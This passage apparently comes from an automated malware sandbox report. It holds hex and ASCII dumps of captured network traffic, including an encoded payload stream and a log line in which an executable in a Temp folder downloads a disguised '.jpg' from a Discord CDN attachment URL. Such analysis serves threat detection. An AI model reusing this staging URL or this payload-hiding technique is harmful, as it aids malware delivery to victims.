20 44 57 20 4f 20 44 45 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 45 70 20 4f
                                                  Data Ascii: EW O qOp O DW O qqE O DW O DE O qqq O DW O DW O DW O DD O qOD O DW O Eq O XM O DW O MO O qqM O DW O DW O DW O DE O qqq O DW O ED O qOp O DD O qOD O DW O Eq O XM O DW O MO O qqM O DW O DW O DW O DE O Ep O DW O Em O Xq O DD O qJJ O DW O DE O Ep O DW O Ep O
                                                  2021-10-29 18:29:49 UTC887INData Raw: 20 4d 4f 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 71 4f 4d 20 4f 20 4d 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 45 20 4f 20 57 71 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 70 20 4f 20 45 57 20 4f 20 44 44 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4f 45 20 4f 20 71 4f 70 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 71 4a 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 57 70 20 4f 20 6d 70 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 71 57 20 4f 20 45 44 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 45 20 4f 20 71 71 6d 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 58 4a 20 4f 20 6d
                                                  Data Ascii: MO O qqM O Xq O DW O DE O qOM O MM O DM O DW O DW O qOE O Wq O Em O DW O DW O Ep O EW O DD O Xq O DW O DX O qOE O qOp O XW O DW O DW O WE O XX O qqJ O DW O DW O EX O Wp O mp O Xq O DW O DX O qqW O ED O DM O DW O DW O XE O qqm O Em O DW O DW O EM O XJ O m
                                                  2021-10-29 18:29:49 UTC903INData Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 4a 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 4f 6d 20 4f 20 45 4d 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 4d 20 4f 20 71 71 45 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4f 20 4f 20 71 4a 4a 20 4f 20 44 45 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 45 45 20 4f 20 57 71 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20
                                                  Data Ascii: O DW O DW O WJ O qqM O DW O DW O DW O qOm O EM O DM O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DM O qqE O XW O DW O DW O EO O qJJ O DE O DW O DW O DE O EE O Wq O qqM O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DE
                                                  2021-10-29 18:29:49 UTC919INData Raw: 4f 20 71 4a 4f 20 4f 20 71 71 4d 20 4f 20 45 58 20 4f 20 71 71 57 20 4f 20 4d 4d 20 4f 20 57 71 20 4f 20 58 4a 20 4f 20 71 4a 71 20 4f 20 58 4d 20 4f 20 57 71 20 4f 20 44 44 20 4f 20 57 70 20 4f 20 58 44 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 44 20 4f 20 71 71 4d 20 4f 20 45 6d 20 4f 20 45 45 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 58 57 20 4f 20 71 4f 4d 20 4f 20 58 44 20 4f 20 71 4a 4a 20 4f 20 4d 58 20 4f 20 57 71 20 4f 20 58 44 20 4f 20 71 4a 71 20 4f 20 58 4d 20 4f 20 57 4f 20 4f 20 58 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 45 20 4f 20 6d 58 20 4f 20 44 58 20 4f 20 4d 58 20 4f 20 45 4a 20 4f 20 45 58 20 4f 20 6d 58 20 4f 20 4d 4d 20 4f 20 71 4f 4d 20 4f 20 71 4a 4f 20 4f 20 71 4f 58 20 4f 20
                                                  Data Ascii: O qJO O qqM O EX O qqW O MM O Wq O XJ O qJq O XM O Wq O DD O Wp O XD O qqM O DW O DW O XD O qqM O Em O EE O MX O WO O EO O qOE O XW O qOM O XD O qJJ O MX O Wq O XD O qJq O XM O WO O XW O DW O DW O EE O mX O DX O MX O EJ O EX O mX O MM O qOM O qJO O qOX O
                                                  2021-10-29 18:29:49 UTC935INData Raw: 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 71 4a 4f 20 4f 20 6d 4d 20 4f 20 57 44 20 4f 20 58 6d 20 4f 20 45 45 20 4f 20 71 71 4d 20 4f 20 71 71 57 20 4f 20 71 4a 4a 20 4f 20 45 44 20 4f 20 71 4a 4a 20 4f 20 71 4f 4a 20 4f 20 71 71 6d 20 4f 20 71 4f 71 20 4f 20 71 4a 4f 20 4f 20 45 70 20 4f 20 58 58 20 4f 20 58 70 20 4f 20 71 4f 58 20 4f 20 71 71 71 20 4f 20 71 4f 57 20 4f 20 58 6d 20 4f 20 71 4f 45 20 4f 20 71 71 70 20 4f 20 57 6d 20 4f 20 71 71 71 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 58 4f 20 4f 20 71 71 58 20 4f 20 57 70 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 4a 4f 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 45 44 20 4f 20 71 4f 6d 20 4f 20 71
                                                  Data Ascii: W O DW O DW O DW O DW O DW O DW O DW O DW O DX O qJO O mM O WD O Xm O EE O qqM O qqW O qJJ O ED O qJJ O qOJ O qqm O qOq O qJO O Ep O XX O Xp O qOX O qqq O qOW O Xm O qOE O qqp O Wm O qqq O Wq O qqX O XO O qqX O Wp O mp O qqX O qJO O mE O XO O ED O qOm O q
                                                  2021-10-29 18:29:49 UTC951INData Raw: 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 57 4f 20 4f 20 44 57 20 4f 20 71 71 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 57 70 20 4f 20 44 57 20 4f 20 58 71 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 71 71 4d 20 4f 20 45 70 20 4f 20 44 57 20 4f 20 45 57 20 4f 20 71 4f 70 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 4d 20 4f 20 58 71 20 4f 20 44 4d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57
                                                  Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O EX O qqM O MX O DW O qOp O DW O WO O DW O qqM O DW O DW O Wp O DW O Xq O DW O DW O DW O DW O DW O DW O DW O DW O XW O EJ O qqM O Ep O DW O EW O qOp O DM O DW O DW O EM O Xq O DM O DW O DW O DW O DW O DW O DW O DW
                                                  2021-10-29 18:29:49 UTC967INData Raw: 71 71 4f 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 6d 20 4f 20 71 4f 70 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 71 4f 4a 20 4f 20 58 57 20 4f 20 71 71 44 20 4f 20 45 6d 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 4a 20 4f 20 71 4f 4d 20 4f 20 71 4a 4f 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 58 57 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 71 71 58 20 4f 20 58 57 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 71 4f 70 20 4f 20 58 6d 20 4f 20 58 71 20 4f 20 6d 58 20 4f 20 6d 58 20 4f 20 4d 58 20 4f 20 71 4f 57 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 57 71 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 57 70 20 4f 20 57 4f 20 4f
                                                  Data Ascii: qqO O mE O WD O Wm O qOp O mE O WD O qqE O MM O qOJ O XW O qqD O Em O DW O DW O DW O DW O DW O DW O DW O DW O qqJ O qOM O qJO O ME O qqX O XW O qqD O ED O qqX O XW O qqD O ED O qOp O Xm O Xq O mX O mX O MX O qOW O WJ O qqE O Wq O WE O mE O qqE O Wp O WO O
                                                  2021-10-29 18:29:49 UTC983INData Raw: 71 70 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 71 20 4f 20 71 71 45 20 4f 20 44 4d 20 4f 20 71 4f 58 20 4f 20 71 4f 4d 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 71 71 4a 20 4f 20 71 4f 4d 20 4f 20 71 4a 4f 20 4f 20 4d 45 20 4f 20 71 71 58 20 4f 20 58 57 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 71 71 6d 20 4f 20 58 58 20 4f 20 45 58 20 4f 20 71 4a 4a 20 4f 20 6d 70 20 4f 20 58 4f 20 4f 20 71 4f 44 20 4f 20 57 4a 20 4f 20 6d 70 20 4f 20 58 4f 20 4f 20 71 4f 44 20 4f 20 57 4a 20 4f 20 6d 70 20 4f 20 58 4f 20 4f 20 71 4f 44 20 4f 20 57 4a 20 4f 20 6d 70 20 4f 20 58 4f 20 4f 20 71 4f 44 20 4f 20 57 4a 20 4f 20 6d 70 20 4f 20 58 4f
                                                  Data Ascii: qp O qOO O WW O qqq O qqE O DM O qOX O qOM O qOO O qOW O DW O DW O DW O DW O DW O DW O DW O DW O qqJ O qOM O qJO O ME O qqX O XW O qqD O ED O qqm O XX O EX O qJJ O mp O XO O qOD O WJ O mp O XO O qOD O WJ O mp O XO O qOD O WJ O mp O XO O qOD O WJ O mp O XO
                                                  2021-10-29 18:29:49 UTC999INData Raw: 4f 20 57 44 20 4f 20 71 71 58 20 4f 20 45 45 20 4f 20 71 4a 4f 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 45 44 20 4f 20 71 4a 4a 20 4f 20 45 45 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 71 4a 71 20 4f 20 57 44 20 4f 20 71 4a 4a 20 4f 20 45 71 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 71 71 58 20 4f 20 45 45 20 4f 20 71 4a 4f 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 45 44 20 4f 20 71 4a 4a 20 4f 20 45 45 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 71 4a 71 20 4f 20 4d 4d 20 4f 20 71 4f 57 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 45 4d 20 4f 20 44 58 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 71 71 4d 20 4f 20 71 4f 44 20 4f 20 44 45 20 4f 20 58 4a 20 4f 20 58 6d 20 4f 20 71 71 57 20 4f 20 45 71 20 4f 20 4d 4d 20
                                                  Data Ascii: O WD O qqX O EE O qJO O qqX O mE O ED O qJJ O EE O MX O mE O qJq O WD O qJJ O Eq O mE O WD O qqX O EE O qJO O qqX O mE O ED O qJJ O EE O MX O mE O qJq O MM O qOW O Wq O mE O Wm O EM O DX O DW O XO O WE O DW O EX O qqM O qOD O DE O XJ O Xm O qqW O Eq O MM


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.749774162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-10-29 18:29:50 UTC1000OUTGET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  2021-10-29 18:29:50 UTC1001INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:29:50 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 257637
                                                  Connection: close
                                                  CF-Ray: 6a5e78bc2bec1772-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 32550
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "3943342e1b45e890a729310467090869"
                                                  Expires: Sat, 29 Oct 2022 18:29:50 GMT
                                                  Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1635499591484284
                                                  x-goog-hash: crc32c=wAW+lg==
                                                  x-goog-hash: md5=OUM0LhtF6JCnKTEEZwkIaQ==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 257637
                                                  X-GUploader-UploadID: ADPycdsh_0GH4h67GfM4DXv45AAKX5J9KadQOaoJgeenVA8XggFohgRrUig2qws-RHRUWddueA29G7svcIC2IfMWyq3dEjwegQ
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cUuh0NZFGFRn39GIrhXS82yw69UarJ9m2tP7T3q1v2udyH9MErWM4MRaFyz%2FY3ey4TpiyluSfjATN0XdLgL4V9ewQfBHezGSi7OZPP1FpyiaajptCREfSq%2FKn9bhCzF%2B3FlDQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  2021-10-29 18:29:50 UTC1002INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                  2021-10-29 18:29:50 UTC1002INData Raw: 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71
                                                  Data Ascii: O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O q
                                                  2021-10-29 18:29:50 UTC1003INData Raw: 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 4f 20 4f 20 58 45 20 4f 20 57 4f 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 4f 44 20 4f 20 71 4f 70 20 4f 20 71 71 4d 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 4d 4d 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 58 57 20 4f 20 71 71 4f 20 4f 20 45 58 20 4f 20 71 71 58 20 4f 20 71 4f 4f 20 4f 20 71 4f 57 20 4f 20 45 4a 20 4f 20 44 4d 20 4f 20 58 4f 20 4f 20 71 71 4a 20 4f 20 44 58 20 4f 20 58 71 20 4f 20 58 57 20 4f 20 45 4a 20 4f 20 71 71 4a 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 45 20 4f 20 57 4f 20 4f 20 71 4f 6d 20 4f 20 45 4a 20 4f 20 58 58 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 71 71 4a 20 4f 20 71 4f
                                                  Data Ascii: O O WW O qqM O mE O WE O XO O XE O WO O mE O mp O qOD O qOp O qqM O DX O mE O Xm O DE O mX O MM O mE O Eq O XW O qqO O EX O qqX O qOO O qOW O EJ O DM O XO O qqJ O DX O Xq O XW O EJ O qqJ O qOp O DW O DW O DW O DE O WO O qOm O EJ O XX O qqO O mE O qqJ O qO
                                                  2021-10-29 18:29:50 UTC1005INData Raw: 4f 20 57 70 20 4f 20 57 6d 20 4f 20 71 71 4f 20 4f 20 71 71 57 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 71 4a 4f 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 71 6d 20 4f 20 71 71 70 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 6d 20 4f 20 45 4d 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20
                                                  Data Ascii: O Wp O Wm O qqO O qqW O XO O WE O qJO O qOO O EJ O qOD O mE O mE O mE O mE O mE O mE O Wm O qqE O qqm O qqp O mE O mE O qqq O Wm O EM O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE
                                                  2021-10-29 18:29:50 UTC1006INData Raw: 71 71 44 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 57 20 4f 20 58 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 45 44 20 4f 20 58 58 20 4f 20 71 4f 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 57 4a 20 4f 20 58 4a 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 71 71 4d 20 4f 20 45 44 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 45 57 20 4f 20 71 4a 71 20 4f 20 45 4d 20 4f 20 58 4d 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20
                                                  Data Ascii: qqD O qqX O mE O qqq O WJ O EE O DW O mE O WO O qOX O qOW O Xq O XO O mp O ED O XX O qOM O EJ O mE O Em O Xq O WJ O XJ O qqM O Xq O qqM O ED O DW O DX O EW O qJq O EM O XM O qqm O mE O mE O mE O mE O mE O mE O mE O Wq O mE O mE O XO O mE O WE O mE O mE O
                                                  2021-10-29 18:29:50 UTC1007INData Raw: 20 57 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 71 4f 57 20 4f 20 71 71 71 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45
                                                  Data Ascii: WJ O mE O mE O mE O mE O mE O mE O mp O EW O qOW O qqq O qqm O mE O Wm O mp O qqX O qqm O mE O mp O qqX O qqm O Wm O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE
                                                  2021-10-29 18:29:50 UTC1009INData Raw: 20 58 4f 20 4f 20 57 45 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 71 4f 57 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 45 45 20 4f 20 71 4f 57 20 4f 20 44 4d 20 4f 20 45 44 20 4f 20 6d 4d 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 57 57 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 58 45 20 4f 20 71 4a 71 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 4f 20 4f 20 71 71 45 20 4f 20 57 57 20 4f 20 58
                                                  Data Ascii: XO O WE O qOO O Xq O qOW O WW O mE O EE O qOW O DM O ED O mM O qOW O XW O qOp O DW O mX O mE O mM O WW O qOO O EJ O mE O Wm O qOq O qOD O XO O mE O WE O XX O XE O qJq O XO O mE O DX O qJO O MM O EJ O mE O qqX O MX O mE O DX O mE O mp O qqO O qqE O WW O X
                                                  2021-10-29 18:29:50 UTC1010INData Raw: 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58
                                                  Data Ascii: O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O X
                                                  2021-10-29 18:29:50 UTC1011INData Raw: 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 71 71 57 20 4f 20 45 57 20 4f 20 57 57 20 4f 20 71 4f 44 20 4f 20 71 4f 45 20 4f 20 71 4a 4a 20 4f 20 44 44 20 4f 20 58 4d 20 4f 20 71 71 45 20 4f 20 71 4f 45 20 4f 20 71 71 4a 20 4f 20 71 71 70 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 58 4d 20 4f 20 44 44 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 45 20 4f 20 71 4f 4a 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 57 4a 20 4f 20 71 4f 71 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 57 44 20 4f 20 58 6d 20
                                                  Data Ascii: O EX O qJq O qqW O EW O WW O qOD O qOE O qJJ O DD O XM O qqE O qOE O qqJ O qqp O EJ O mE O qOJ O XM O DD O WE O mE O Wq O qqJ O WE O qOJ O XO O WE O WJ O qOq O qqO O qqm O mE O qOO O Wq O qqJ O Wm O mE O Wq O EX O Wq O qOq O XO O mp O WJ O qqE O WD O Xm
                                                  2021-10-29 18:29:50 UTC1013INData Raw: 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 45 